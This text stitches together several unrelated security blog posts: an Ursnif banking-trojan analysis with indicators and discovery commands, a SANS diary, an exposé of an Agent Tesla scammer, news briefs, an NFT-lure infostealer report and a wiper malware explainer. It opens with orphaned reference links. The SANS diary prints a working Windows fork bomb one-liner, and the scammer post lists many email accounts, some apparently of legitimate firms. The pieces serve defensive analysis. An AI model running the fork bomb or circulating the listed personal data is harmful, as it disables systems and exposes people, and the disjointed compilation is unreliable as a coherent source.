[1] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[2] https://www.independent.co.uk/tech/chernobyl-ukraine-petya-cyber-attack-hack-nuclear-power-plant-danger-latest-a7810941.html

[3] https://home.treasury.gov/news/press-releases/sm1162

[4] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[5] https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool

This article was originally published on Power Engineering.

Ursnif (aka Gozi, Dreambot, ISFB) is one of the most widespread banking trojans. It has been observed evolving over the past few years. Ursnif has shown incredible theft capabilities. In 2020 Ursnif rose to prominence becoming one of the top ten most prolific pieces of malware. Among its core functionalities are stealing credentials, downloading other malware, working as a keylogger, among others.

Ursnif is mostly spread through spear phishing emails. Its attacks are often targeted at banking, financial services, and government agencies. In phishing emails, it tries to impersonate government authorities and leverage current events in the news to gain user trust, which leads to initial access to the victim’s system. Once the user opens the malicious attachment, the trojan uses User Agents that imitated Zoom and Webex in a further effort to blend in and allow for exploitation. This behavior was observed during the peak of the pandemic.

Technical Analysis of Ursnif Malware

Infection Chain

In our analysis, phishing emails with a macro embedded XLS attachment or a zip attachment containing an HTA file initiated the infection chain, as pictured below.

Fig. 1 Infection chain

Infection Scenario 1: XLS Document Analysis

A malicious XLS document (fig. 2) pretends to be a document related to DHL, the shipping company. It contains VBA macro code to download a binary file from the URL embedded in the document. Once the User enables macro content, the macro gets executed which further downloads the executable binary.

Fig. 2 Malicious XLS document

After downloading the binary file, it retrieves the handle of explorer.exe process and calls UpdateProcThreadAttribute to perform parent PID spoofing (fig. 3).

Fig. 3 VBA macro code performing PPID spoofing

In the parent process of the dropped executable, (1440.exe) is spoofed to explorer.exe. to evade detection (fig. 4).

Fig. 4 PPID spoofing

Infection Scenario 2: HTA Document Analysis

In another infection scenario, we observed that the phishing email is sent with a zip attachment having an HTA file. After de-obfuscating several layers, PowerShell script downloads a DLL file from an embedded URL and executes it using rundll32.exe. The extension used for the remote DLL is .txt, a feasible way to evade the watchful eyes of most security products.

Below, figure 5 shows several obfuscation layers in the HTA sample:

Fig. 5 HTA document analysis

Technical Analysis of Ursnif Loader

Ursnif loader contains several layers of in-memory unpacking routines which are observed in malware families like zloader, emotet, and others. It rewrites an in-memory image with a new unpacked binary that uses the Thread APC injection technique to execute malicious code in another thread of a current process. Once the control is passed to the final loader, it decrypts the BSS section.

The BSS section contains important configuration details in encrypted form, such as libraries and API names, string formats for sending data to Command & Control (CnC), registry entries, bat commands format, PowerShell commands format, HTA application format, etc. These configuration details are required for performing further activities. Below, figures 7 and 8 reveal that the malware uses campaign date as a key to decrypt the BSS section.

Fig. 6 BSS section decryption routine

Fig. 7 Decrypted BSS section content

Ursnif parses the configuration details through the JJ structure present in the PE (Portable Executable) header (fig. 9). The JJ structure contains the config blob address, config size, CRC Hash of decoded config and XOR key used to decode the config blob.

Fig. 8 JJ header of loader

Below, figure 10 reveals the configuration details present in the blob.

Fig. 9 Configuration blob of loader

The malware process iterates through CnC and uses these configuration details to generate a http GET request to CnC as shown in figure 10. It collects some information from the host machine like computer name, username, uptime, and CRC.

Fig. 10 HTTP GET request

Below are parameters which are encrypted in the GET request:

soft, version, user, server, id, crc, uptime, size, hash, dns, whoami

Parameters like soft and version are hardcoded in the binary. Here, the version might specify the malware binary version.

The user parameter is generated using username, computer name, and the result of _CPUID instruction. It may be used by the threat actor to uniquely refer to execution instance.

The server and id values are taken from the extracted config.

The uptime parameter is a result of the QueryPerformanceCounter API.

Further, it encrypts a http request with (AES-CBC mode) using a 128-bit key present in the extracted config and performs BASE64 encoding. It performs transformations like replacing +, / with _2B, _2F respectively and inserts / at random locations.

Figure 11 shows a typical encrypted http GET request.

Fig. 11 Encrypted request

If CnC is active, it responds with encrypted data in BASE64 encoded form. In recent versions (2.60.xxx), we observed that sometimes data is not base64 encoded. Below, figure 12 shows a typical response from the server:

Fig. 12 Encrypted response

Ursnif malware first decodes the base64 string and then decrypts the last 0x80 bytes using an RSA key embedded in the config. Below, figure 13 reveals the RSA key present in the config.

Fig. 13 RSA key present in the sample

Fig. 14 Implementation for RSA decryption logic

The last 0x80 bytes holds required information to decrypt the full response like a MD5 hash of the decrypted data, the key to decrypt data, and the size of the data to decrypt (fig. 15).

Fig. 15 Last 0x80 bytes of response

Once the full response is decrypted (AES-CBC mode) using the key received, it will validate the decrypted data by checking the MD5 hash. Ursnif can take a different action based on the response received. In our analysis, we observed that the decrypted data is the final payload of Ursnif.

Technical Analysis of Ursnif Payload

In our analysis, we saw that the final payload is a keylogger. Once control is transferred to the payload, it will connect to the CnC address extracted from its config and download an RSA encrypted browser account grabber module.

After decryption, it collects Chrome, Firefox, and Microsoft Edge browsers’ sensitive info like credentials, cookies, etc. via this grabber module, compresses it, and AES (Advanced Encryption Standard) encrypts it using the key from config. Further, it sends this information to the attacker’s CnC via http post request (figs. 16, 17). While sending information, it uses the following different values for the post parameter type to differentiate the kind of information it is sending. Some values include:

Type=6 – System infoType=15 – Key logged data, clipboard etc.Type=20 – Saved browser credentialsType=22 – Cookies

Fig. 16 Sending credentials

Fig. 17 Sending cookies

Ursnif malware also collects and sends the following sensitive system information:

Output of System Info commandList of processes – task list /svcList of installed drivers – driver queryRegistry query information (details of installed applications) –reg query HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallOutput of Net config workstation

Ursnif then starts capturing keylogging and clipboard events in the system and sends it to the attacker’s CnC at regular intervals. All the data it sends is first compressed and then AES encrypted using the key present in the config.

Based on Ursnif’s code, the malware also has the capability to download and execute binary and upload files and screenshots from the victim’s system.

Based on our analysis, one thing is clear: Ursnif is bad news.

IOCs:Domains:

Cloudlines[.]top
linkspremium[.]ru
premiumlists[.]ru
Vilogerta[.]top
interblog[.]top
interforum[.]top
premiumlines[.]top
linespremium[.]ru
linespremium[.]pw
blogerslives[.]com
blogerslines[.]com
blogspoints[.]com
blogspoints[.]ru
filmspoints[.]com

Hashes:

XLS document:D39AAA321588E8B1E8FE694732B533BE31C57B60A3C1B7CF73047974606C0C64EF2CD6B4FD4FBEEDC663F59C5196F63338B9F66242230D15F70CDAEBA3BFDE54

Hta document:DC21DB5D469BD554E41C8AEA35324E875475418AE23EB2378265636F0F781F85

loader:42A1D2A7885898C85524A6B18550A9E01B86E5AD1C33AF845B6AE1450EF69BFED61EE5E7B17684983EA9049F719BEB05978A813638F53F7625E970BAE1C2ABD732C049803E5E151D305C79A1067920A7EAA2DABB92FA7F33EF950097BBA016F2

Payload:CCB10C384D7A9C1D5C1C0383F97DF96B299D641FAECC7F3B4A5F31F2C0707C8A739E193792AA810BCB005DDF4606366D472FE41EC50C304384EBA212510CC239A204181541DC2772443BB00328D084EDC872CF61289862220F93994FE4E9ED210F3AA6870B171BEA342D0CF7166332F047BA58CCDED701E0AAA2BE84194203B9

Browser account grabber91C4EDD3F6C51AFFD87434A3DB15B25408C26F7B77D94E568F91B9A5C4D6337244E35DB1C2BFEEEE33F0A74874BE2E0CC041A38E63E78DA425052B0DFEB5F93D

Ursnif Mitre Att&ck TTP Map:

Initial AccessExecutionPersistenceprivilege EscalationDefense EvasionCredential AccessDiscoveryCollectionCommand and ControlExfiltrationPhishing: Spear phishing Attachment (T1566.001)User Execution (T1204 .002)Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)Process Injection: Asynchronous Procedure Call (T1055.004)Parent PID Spoofing (T1134.004)Credentials from Password Stores: Credentials from Web Browsers (T1555.003)Application Window Discovery (T1010)Clipboard Data (T1115)Application Layer Protocol: Web Protocols (T1071.001)Exfiltration Over C2 Channel (T1041)Command and Scripting Interpreter: Visual Basic (T1059.005)Create or Modify System Process: Windows Service (T1543.003)Obfuscated Files or Information (T1027)Input Capture: Keylogging (T1056.001)Process Discovery (T1057)Input Capture: Keylogging (T1056.001)Ingress Tool Transfer (T1105)Command and Scripting Interpreter: PowerShell (T1059.001)Process Injection: Asynchronous Procedure Call (T1055.004)Input Capture: GUI (Graphical User Interface) Input Capture (T1056.002)Query Registry (T1012)Input Capture: GUI Input Capture (T1056.002)Windows Management Instrumentation (T1047)System Binary Proxy Execution – Regsvr32 (T1218.010)Steal Web Session Cookie (T1539)System Information Discovery (T1082)Data from Configuration Repository: Network Device Configuration Dump (T1602.002)System Binary Proxy Execution – Rundll32 (T1218.011)System Service Discovery (T1007)

Detection, Mitigation or Additional Important Safety Measures

Beware of emails

Don’t open attachments and links from unsolicited emails. Delete suspicious looking emails you receive from unknown sources, especially if they contain links or attachments. Cybercriminals use ‘social engineering’ techniques to lure users into opening attachments or clicking on links that lead to infected websites.

Disable macros for Microsoft Office

Don’t enable macros in document attachments received via email. A lot of malware infections rely on your action to turn ON macros.Consider installing Microsoft Office Viewers. These viewer applications let you see what documents look like without even opening them in Word or Excel. More importantly, the viewer software doesn’t support macros at all, so this reduces the risk of enabling macros unintentionally.

During a malware analysis class I taught recently, one of the students asked me what was “the simplest malware in the world”. Of course, the answer to this question would depend heavily on one’s definitions of ‘simplest’ and ‘malware’, as well as on a target hardware architecture and its operating system (and potentially additional software and other factors), but I thought that it was conceptually interesting enough to devote today’s diary to.

If we were to discuss simplicity only in the terms of overall size of the code, and define ‘malware’ (with small help from NIST[1]), as a “program, that is intended to compromise the confidentiality, integrity, or availability of the victim’s data, applications, or operating system or to otherwise annoy or hinder the victim”, then the simplest malware overall would probably be a single instruction of the “Halt and Catch Fire” type[2] for any platform, on which instructions capable (by design or due to a bug) of stopping CPU operations were available and could be executed on their own. Or – to be exact – the simplest malware would probably be such a code on a platform, on which the instruction would be shortest (which would probably come to a single byte). However, this is purely theoretical answer from a historical standpoint.

If we were move beyond this case and focus only on code that can run on modern operating systems and current hardware platforms, the situation becomes much more complex. And although I spent some time thinking about what the smallest malware might be, and I do have a potential answer, I’m not completely certain it is the correct one. If you can think of a smaller example of a working malicious code, let us know in the comments.

Anyway, since I wasn’t able to think of, nor find anything “smaller”, I came to believe that the most common version of the fork bomb for Windows might be the smallest (at least the smallest current) real world malware.

Fork bombs, or “rabbits” or “wabbits”, as they are also sometimes called, are probably among the oldest types of malware overall[3], and they are quite simple. Their only function is to execute two copies of themselves each time they are run. This means that once a fork bomb is executed on a system, the number of fork bomb processes running on that system will start exponentially increasing, which – as you can probably imagine – will quickly result in resource exhaustion.

The most well-known fork bomb for Windows, which may be implemented as a standalone batch file, is made up of only the following 5 ASCII characters (i.e., 5 bytes). 

%0|%0

Despite its small size, it can have a quick and fairly unpleasant effect – feel free to test it for yourself (though, I would recommend that you do so in a VM, which you won’t mind rebooting afterwards).

As I’ve mentioned, I’m not completely sure that this fork bomb is the smallest malware there is for modern platforms, however, with only 5 bytes in length, it has to be at least close… And it shows quite well that malware does not have to be complex to be effective.

[1] https://csrc.nist.gov/glossary/term/malware
[2] https://en.wikipedia.org/wiki/Halt_and_Catch_Fire_(computing)
[3] https://en.wikipedia.org/wiki/Wabbit_(computing)

———–
Jan Kopriva
@jk0pr
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Agent Tesla is a well-known data stealer written in .NET that has been active since 2014 and is perhaps one of the most popular payloads observed in malspam campaigns.

While looking for threats targeting Ukraine, we identified a group we call “Nigerian Tesla” that has been dabbling into phishing and other data theft activities for a number of years. Ironically, one of the main threat actors seemingly compromised his own computer with an Agent Tesla binary.

In this blog, we expose some of the activities from a scammer who started off with classic advance-fee schemes and is now successfully running Agent Tesla campaigns. In the past two years, this threat actor was able to collect close to a million credentials from his victims.

Spam campaign

Our investigation started with an email targeting titled Остаточний платіж.msg (Ukrainian for Final payment.msg). It contained a link to a file sharing site that downloads an archive containing an executable file.

Figure 1: Spam email with Agent Tesla

This executable is actually an Agent Tesla stealer, capable of exfiltrating data in multiple ways, though most commonly using SMTP. The technique is really simple as it only requires an email account that sends messages to itself containing stolen credentials for each victim that executed the malware on their computer.

Test successful!

The attacker sent a number of messages containing the body “Test successful!” from the same machine. Those emails should have been deleted for obvious reasons but this threat actor did not and leaked his own IP address allowing us to locate them in Lagos, Nigeria.

Figure 2: Test emails sent by the attacker

These messages are checks done by the threat actor to make sure communication with Agent Tesla is configured properly. This is typical and is often described in hacking forums where users ask for help with the ‘software’.

Figure 3: Forum post complaining about issue not receiving logs

There were an additional 26 emails sent from the same IP address that weren’t test emails but came from a real Agent Tesla execution. We don’t know exactly how, but the attacker managed to infect his own machine.

Figure 4: Information exfiltrated from the attacker’s machine

Here is a list containing some of the services that the Nigerian Tesla threat actor used:

PerfectMoneyGlassdoor signupanywhere (could be a source to get victims emails)omail.io (service for extracting emails)warzone.ws (Warzone RAT)worldwiredlabs (NetWire RAT)le-vpn.com and bettervpn.com zenmate.com tigervpn hotvpn (VPN provider)securitycode.eu cassandra.pw (Code Protector)esco.pw (office document protection)monovm hostwinds.com firevps dynu 4server.su (VPS and dedicated servers)dnsomatic.com cloudns.net (DNS services)spam-lab.sufilesend.io 4shared (hosting files)avcheck.net (offline av test)bitshacking.comarchive.org (used like cloud storage)xss.is hackforums.net exploit.intitan.email (.pw accounts, various scams)

Rita Bent, Lee Chen and John Cooper are some of the names that have been used in the past along with dozens of different email accounts with passwords containing the string ‘1985’. The following image shows the activity from user rita398 in hackforums asking about Esco Crypter:

Figure 5: Rita398 interested in Esco Crypter

In that case, we see Rita complaining about some RDP suspension that happened eventually to one of his registered domains.

Figure 6: RDP shutdown complain

The following email accounts were used in various phishing and data stealing operations:

along.aalahajirazak.ibrahim@gmail.comadministracion@romexpert.esadministracioneforce@eforce.essoceanwave244@gmail.combarristeradamssetien@gmail.comcatalinafuster@palmaprocura.comdavid01smith@yandex.comdavidsmith.ntx31@yandex.comdavids27smith@yandex.comelisabet.valenti@ag.barymont.comgestor3@afectadosvolkswagenabogados.cominfo@borrellacerrajeros.cominfo@crmarismas.orginfo@cristaleriagandia.cominfogestinsur@grupogestinsur.cominstalaciones@gopamar.comisabel@grupoatu.comm.lopez@forestadent.esnacho@alasvigilnevot.comrestaurante@elsecretodechimiche.comsoceanwave244@gmail.comtienda@di-tempo.comtorremolinos3@copiplus.esv.reino@gooddental.esvictor@sugesol.comvives@viveselectricitat.com

Based on these profiles, we can see this threat actor has an extensive criminal record starting at least from 2014. Back then, they performed classic scams under the Rita Bent moniker.

Figure 7: Scam conducted by the same attacker in the past

One of their preferred scams was phishing for Adobe login pages. We have records indicating that several Adobe fake pages were deployed from 2015 until recently. Landing pages looked like the following:

Figure 8: Fake Adobe login page

Fast forward to 2020, and the threat actor has graduated to malware distributor. He protects his binaries with the Cassandra Protector obfuscator and then checks them against AVcheck[.]net.

Figure 9: Cassandra Protector

Figure 10: AVcheck[.]net

Who is behind these attacks?

The threat actor shared photos of himself back in 2016 and for some reason forgot about them.

Figure 11: Photos of the threat actor

E.K. was born in 1985 according to his driver license. Remember that 1985 was used in a lot of passwords collected from accounts that conducted these illegal activities.

Figure 12: Threat actor’s drivers license

At the moment, we do not have much information about other members in the team. But E. K. seems to be the most relevant figure, at least the one who started the scheme.

From 419 scams to Agent Tesla

Nigerian Tesla stole more than 800,000 different credentials from about 28,000 victims. This shows how simple and yet effective running one of these campaigns can be. In this case we see an interesting evolution from a threat actor that was performing the classic advance-fee scam (419 scam) before moving into the malware distribution world, more or less for the same end goal.

Malwarebytes users are protected against Agent Tesla. We detect this sample as Spyware.Password.Stealer.

The post Nigerian Tesla: 419 scammer gone malware distributor unmasked appeared first on Malwarebytes Labs.

netdooka-cover.png

This report focuses on the components and infection chain ⁠of the NetDooka framework. Its scope ranges from the release of the first payload up until the release of the final RAT that is protected by a kernel driver.

image8.jpg

By Jung soo An, Asheer Malhotra and Justin Thattil, with contributions from Aliza Berk and Kendall McKay.

In February 2022, corresponding roughly with the start of the Russian Invasion of Ukraine, Cisco Talos began observing the China-based threat actor Mustang Panda conducting phishing campaigns…

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Exposing Malware in Linux-Based Multi-Cloud Environments, a recent report conducted by the VMware Threat Analysis Unit takes a comprehensive look at attacks in Linux-based multi-cloud environments.

These malware attacks, according to the report, are often leveraged by the adversary once inside, which includes executing ransomware, deploying cryptomining components, and RATs.

The VMware Threat Analysis Unit analyzed nine ransomware families that target Linux-based systems providing brief descriptions of each and an analysis of the different characteristics of the ransomware samples of each of these families.

“The analysis of these artifacts looked at code fragments and other meta-information to understand the relationships between families, showing how it is possible to characterize similar samples and identify the lineage and evolution of specific families,” explains Giovanni Vigna, Senior Director of Threat Intelligence at VMware and one of the authors of the report.

The report also dives into some key analyses of the cryptomining components used in recent cryptojacking attacks, types of digital currencies mined, techniques deployed, and how the threat can be detected and mitigated.

Check out the infographic for key findings.

In the rapidly changing threat landscape, organizations must arm themselves with strategic and actionable threat analysis to detect and mitigate threats. To find out how to protect your multi-cloud environments, download the VMware Threat Analysis Unit’s newest report.

Download — Exposing Malware in Linux-Based Multi-Cloud Environments 

The post Infographic – Exposing Malware in Linux-Based Multi-Cloud Environments appeared first on VMware Security Blog.

cw-podcast-050422.jpg

An upswing in malware deployed against targets in Eastern Europe. Cozy Bear is typosquatting. CuckooBees swarm around intellectual property. Tracking the DPRK’s hackers. Quiet persistence in corporate networks. CISA issues an ICS advisory. Caleb Barlow on backup communications for your business during this period of “shields up.” Duncan Jones from Cambridge Quantum sits down with Dave to discuss the NIST algorithm finalist Rainbow vulnerability. And, hey, officer, honest, it was just a Squirtle….

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/86

Selected reading.

Update on cyber activity in Eastern Europe (Google) 

Multiple government hacking groups stay busy targeting Ukraine and the region, Google researchers say (CyberScoop)

Google: Nation-state phishing campaigns expanding to target Eastern Europe orgs (The Record by Recorded Future)

SolarWinds hackers set up phony media outlets to trick targets (CyberScoop) 

SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse (Recorded Future) 

Experts discover a Chinese-APT cyber espionage operation targeting US organizations (VentureBeat)

Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason Nocturnus) 

Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques (Cybereason) 

Chinese hackers cast wide net for trade secrets in US, Europe and Asia, researchers say (CNN) 

Researchers tie ransomware families to North Korean cyber-army (The Record by Recorded Future)

The Hermit Kingdom’s Ransomware Play (Trellix)

New espionage group is targeting corporate M&A (TechCrunch) 

Cyberespionage Group Targeting M&A, Corporate Transactions Personnel (SecurityWeek) 

UNC3524: Eye Spy on Your Email (Mandiant) 

Yokogawa CENTUM and ProSafe-RS (CISA) 

Cops ignored call to nearby robbery, preferring to hunt Pokémon (Graham Cluley)

The wacky world of ape jpegs are at the heart of yet another increasingly bizarre internet scam, which contains malware, stolen accounts, a faint possibility of phishing, and zips full of ape pictures.

The Ape Executives have a job offer you can, and must, refuse

Lots of people with art profiles on social media in Japan and elsewhere have reported messages from people claiming to be from the “Cyberpunk Ape Executives”. These messages promoted some sort of upcoming project related to both cyberpunk and apes.

Users on several sites including DeviantArt and Pixiv were sent identical missives from a variety of accounts:

Not just on Pixiv, these same NFT scammers (Cyberpunk Ape Executives) were bothering me (and assumedly other artists) on DeviantART yesterday too, despite me writing that I’m anti-NFT on my profile page.🙄 https://t.co/RLCV40tx2j pic.twitter.com/G0E9izR0TO

— Katy133 (@JKaty133) May 2, 2022

“We appreciate your artwork…”

The messages received by these artists reads as follows:

Hi! We appreciate your artwork! Cyberpunk Ape Executives is inviting 2D-artists (online / freelance) to collaborate in creating NFT project. As a 2D-artist you will create amazing and adorable NFT characters. Your characters will become an important part of our NFT universe! Our expectations from the candidate: 1) Experience as a 2D-artist 2) Experience and examples of creating characters 3) Photoshop skills

Main tasks: 1) Creating characters in our NFT style 2) Interaction with Art Team Lead on task setting, feedback. For further communication check out the examples of our NFT works: [url removed] and send a reply (CV + examples of your works) for this position. Approximate payment per day = $200-$350. We make payments to Paypal, BTC, ETH, LTC.

Anyone clicking the link was directed to a MEGA download page. The .rar file to download weighs in at 4.1MB, and comes with the password “111” supplied. Artists expecting to find ape jpegs are in for a horrible surprise, not least because it does in fact contain several ape jpegs. It also contains something else pretending to be an ape jpeg. Observe:

Can you spot the ape doing his own thing? Note that without “view file extensions” enabled, you wouldn’t notice the odd one out. Cyberpunk Ape Executive #19 is up to no good, with the gif.exe extension. Disguising executables as image files is an ancient technique, but it seems profitable in ape jpeg land. Artists opening up the file would infect their system with a form of infostealer which Malwarebytes detects as Spyware.PasswordStealer.EnigmaProtector.

Message spam galore

Many people are pointing out that their accounts started spamming the same bogus promotional messages seen up above. Here’s one example found on ArtStation from last week:

Turns out my ArtStation account was hacked and they send out a bunk of messages to artists to recruit them for an NFT project, if you get messaged for a Cyberpunk Ape Executives crypto project, it’s a scam probably #nft #crypto #NFTCommunity pic.twitter.com/LlOPQfZN9s

— Deazee (@deazeeworks) April 26, 2022

There is clearly some form of account compromise taking place, however at time of writing it’s difficult to 100% pin this on the infection file. Those who’ve suffered an account breach typically don’t confirm one way or the other if the infection or phishing of some kind is responsible (warning: very angry and swear filled artist Tweets ahoy).

What we’ve observed that it connects to a server, sending some basic system information like Operating System and various system parameters. There’s no direct evidence of password theft (yet), though it could be waiting for direct orders or certain conditions to swipe data.

Keeping your accounts safe

It’s possible there’s a phishing aspect to this independent of the infostealer. Perhaps there’s a second set of messages aimed at tricking people into visiting fake logins, though we stress there is currently no evidence of this. The executable seems the most likely candidate. Either way, our tips are as follows:

Do not download the .rar containing the apes. If you have, do not open up the .gif.exe file. Proceed to running security scans at this point, and ensure whatever you have on board is quarantined and stripped out from your system.If there are messages from so-called Cyberpunk Ape Executives bouncing around somewhere sending you login links, don’t enter the credentials they happen to be asking for. Done this already? Log in and change your password. If they’ve already changed your login, contact support as soon as possible. Again: we don’t know if a phish campaign is operating in tandem with the infection file campaign, and we’d suggest you’re most likely to fall foul of login compromise via the system infection.

All my apes giving security advice

Possibly the most amazing thing here is that the Cyberpunk Ape Executives actually do appear to exist. Here’s the genuine Ape Executives themselves, warning artists about the fakers:

There’s currently a scam going around with people pretending to work with us. This is not real. Don’t respond. Don’t click the link. Report the people who are doing this on the platform they contact you on. #ApeExecutives pic.twitter.com/A60J3Tt1ks

— CYBERPUNK APE EXECUTIVES (PHASE ONE SOLD OUT) (@ApeExecutives) April 26, 2022

Accept no ape imitations.

We’ll continue to observe this one and add to the post should any fresh information come to light. For now, keep a close eye on messages sent your way. There’s nothing better for an artist than receiving the possibility of a well paying commission. Unfortunately, all you’ll be paying with here is system data, and quite possibly your logins too.

The post Fake Cyberpunk Ape Executives target artists with malware-laden job offer appeared first on Malwarebytes Labs.

Mandiant is reporting on a new botnet.

The group, which security firm Mandiant is calling UNC3524, has spent the past 18 months burrowing into victims’ networks with unusual stealth. In cases where the group is ejected, it wastes no time reinfecting the victim environment and picking up where things left off. There are many keys to its stealth, including:

The use of a unique backdoor Mandiant calls Quietexit, which runs on load balancers, wireless access point controllers, and other types of IoT devices that don’t support antivirus or endpoint detection. This makes detection through traditional means difficult.
Customized versions of the backdoor that use file names and creation dates that are similar to legitimate files used on a specific infected device.
A live-off-the-land approach that favors common Windows programming interfaces and tools over custom code with the goal of leaving as light a footprint as possible.
An unusual way a second-stage backdoor connects to attacker-controlled infrastructure by, in essence, acting as a TLS-encrypted server that proxies data through the SOCKS protocol.

[…]

Unpacking this threat group is difficult. From outward appearances, their focus on corporate transactions suggests a financial interest. But UNC3524’s high-caliber tradecraft, proficiency with sophisticated IoT botnets, and ability to remain undetected for so long suggests something more.

From Mandiant:

Throughout their operations, the threat actor demonstrated sophisticated operational security that we see only a small number of threat actors demonstrate. The threat actor evaded detection by operating from devices in the victim environment’s blind spots, including servers running uncommon versions of Linux and network appliances running opaque OSes. These devices and appliances were running versions of operating systems that were unsupported by agent-based security tools, and often had an expected level of network traffic that allowed the attackers to blend in. The threat actor’s use of the QUIETEXIT tunneler allowed them to largely live off the land, without the need to bring in additional tools, further reducing the opportunity for detection. This allowed UNC3524 to remain undetected in victim environments for, in some cases, upwards of 18 months.

best_practices_OG.jpg

Executive summary

2022 has experienced an increase in the number of wiper variants targeting Ukrainian entities.
This blog post looks to explain how wipers work, what makes them so effective and provides a short overview of the most recent samples that appeared in the eastern Europe geopolitical conflict.

How does wiper malware work?

Wiper’s main objective is to destroy data from any storage device and make the information unavailable (T1485). There are two ways of removing files, logical and physical.

Logical file removal is the most common way of erasing a file, performed by users daily when a file is sent to (and emptied from) the Recycle bin, or when it is removed with the command line or terminal with the commands del/rm. This action deletes the pointer to the file but not the file data, making it recoverable with forensic tools as long as the Operative System does not write any other file in the same physical location.

However, malware wipers aim to make the data irrecoverable, so they tend to remove the data from the physical level of the disk. The most effective way to remove the data/file is by overwriting the specific physical location with other data (usually a repeated byte like 0xFF). This process usually involves writing to disk several Gigabytes (or Terabytes) of data and can be time consuming. For this reason, in addition to destroying the data, many wipers first destroy two special files in the system:

The Master Boot Record (MBR), which is used during the boot process to identify where the Operative System is stored in the disk. By replacing the MBR, the boot process crashes, making the files inaccessible unless forensic methodologies are used.
The Master File Table (MFT) is exclusive to NTFS file systems, contains the physical location of files in the drive as well as logical and physical size and any associated metadata. If big files need to be stored in the drive, and cannot use consecutive blocks, these files will have to be fragmented in the disk. The MFT holds the information of where each fragment is stored. Removing the MFT will require the use of forensic tools to recover small files, and basically prevents recovery of fragmented files since the link between fragments is lost.

The main difference between wipers and ransomware is that it’s impossible to retrieve the impacted information after a wiper attack. Attackers using wipers do not usually target financial reward but intend to disrupt the victim’s operations as much as possible. Ransomware operators aim to get a payment in exchange for the key to decrypt the user’s data.

With both wiper and ransomware attacks, the victim depends on their back up system to recover after an attack. However, even some wiper attacks carry ransom notes requesting a payment to recover the data. It is important that the victim properly identifies the attack they’ve suffered, or they may pay the ransom without any chance of retrieving the lost data.

In the last month and a half, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks (T1499) to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time. Some of the wipers observed in this timeframe have been: WhisperKill, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero Wiper and AcidRain.

Most recent wiper examples

WhisperKill

On January 14, 2022, the Ukrainian government experienced a coordinated attack on 22 of their government agencies, defacing their websites. Almost all the compromised websites were developed by the same Ukranian IT company, Kitsoft, and all of them were built on OctoberCMS. Therefore, the attack vector was most probably a supply chain attack on the IT provider, or an exploitation of an OctoberCMS vulnerability, combined with exploitations of Log4Shell vulnerability (T1190).

defaced Ukrainian website

Figure 1. Example of defaced Ukrainian government website.

In addition to the website defacement, Microsoft Threat Intelligence Center (MSTIC), identified in a report destructive malware samples targeting Ukrainian organizations with two malware samples. Microsoft named the samples WhisperGate, while other security companies labeled the downloader as WhisperGate and WhisperKill as the actual wiper, which was considered a component of WhisperGate.

The identified files were:

Stage1 replaces the Master Boot Record (MBR) with a ransom note when the system is powered down, deeming the machine unbootable after that point. When booted up, the system displays Figure 2 on screen. Despite the ransom request, the data will not be recoverable since all efforts made by WhisperKill are looking to destroy data, not encrypt it. In this case, the wallet is most probably an attempt to decoy attribution efforts.

wiper ransom note

Figure 2. Ransom note obtained by MSTIC.

Stage 2 attempts to download the next stage malware (T1102.003) from the Discord app, if unsuccessful, it sleeps and tries again. The payload downloaded from the messaging app destroys as much data as possible by overwriting certain file types with 0xCC for the first MB of the file. Then it modifies the file extension to a random four-byte extension. By selecting the file types to be wiped and only writing over the first MB of data, the attackers are optimizing the wiping process. This is due to not wasting time on system files and only spending the necessary time to wipe each file, rapidly switching to the next file as soon as the current one is unrecoverable. Finally, the malware executes a command to delete itself from the system (T1070.004).

HermeticWiper

A month after, on February 23rd 2022, ESET Research reported a new Wiper being used against hundreds of Ukrainian systems. The wiper receives its name from the stolen certificate (T1588.003) it was using to bypass security controls “Hermetica Digital Ltd” (T1588.003). According to a Reuters article, the certificate could have also been obtained by impersonating the company and requesting a certificate from scratch.

hermetica certificate

Figure 3. Hermetica Digital Ltd certificate.

The attackers have been seen using several methods to distribute the wiper through the domain, like: domain Group Policy Object (GPO) (T1484.001), Impacket or SMB (T1021.002) and WMI (T1047) with an additional worm component named HermeticWizard.

The wiper component first installs the payload as a service (T1569.002) under C:Windowssystem32Drivers. Afterwards, the service corrupts the first 512 bytes of the MBR of all the Physical Drives, and then enumerates their partitions. Before attempting to overwrite as much data as the wiper can it will delete key files in the partition, like MFT, $Bitmap, $LogFile, the NTUSER registry hive (T1112) and the event logs (T1070.001).

On top of deleting key file system structures, it also performs a drive fragmentation (breaking up files and segregating them in the drive to optimize the system’s performance). The combination of the file fragmentation and the deletion of the MFT makes file recovery difficult, since files will be scattered through the drive in small parts – without any guidance as to where each part is located.

Finally, the malware writes randomized contents into all occupied sectors in the partition in an attempt to remove all potential hope of recovering any data with forensic tools or procedures.

IsaacWiper

A day after the initial destructive attack with HermeticWiper, on February 24th, 2022, a new wiper was used against the Ukrainian government, as reported by ESET, without any significant similarities to the HermaticWiper used the day before.

IsaacWiper identifies all the physical drives not containing the Operative System and locks their logical partitions by only allowing a single thread to access each of them. Then it starts to write random data into the drives in chunks of 64 KB. There is a unique thread per volume, making the wiping process very long.

Once the rest of the physical drives and the logical partitions sharing physical drive with the Operative System’s volume have been wiped, this last volume is wiped by:

Erasing the MBR.
Overwriting all files with 64 KB chunks of random data with one thread.
Creating a new file under the C drive which will be filled with random data until it takes the maximum space it can from the partition, overwriting the already overwritten existing files. This process is performed with a different thread, but it would still take a long time to write the full partition since both concurrent threads are actually attempting to write random data on the full disk.

Isaacwiper strings

Figure 4. IsaacWiper strings.

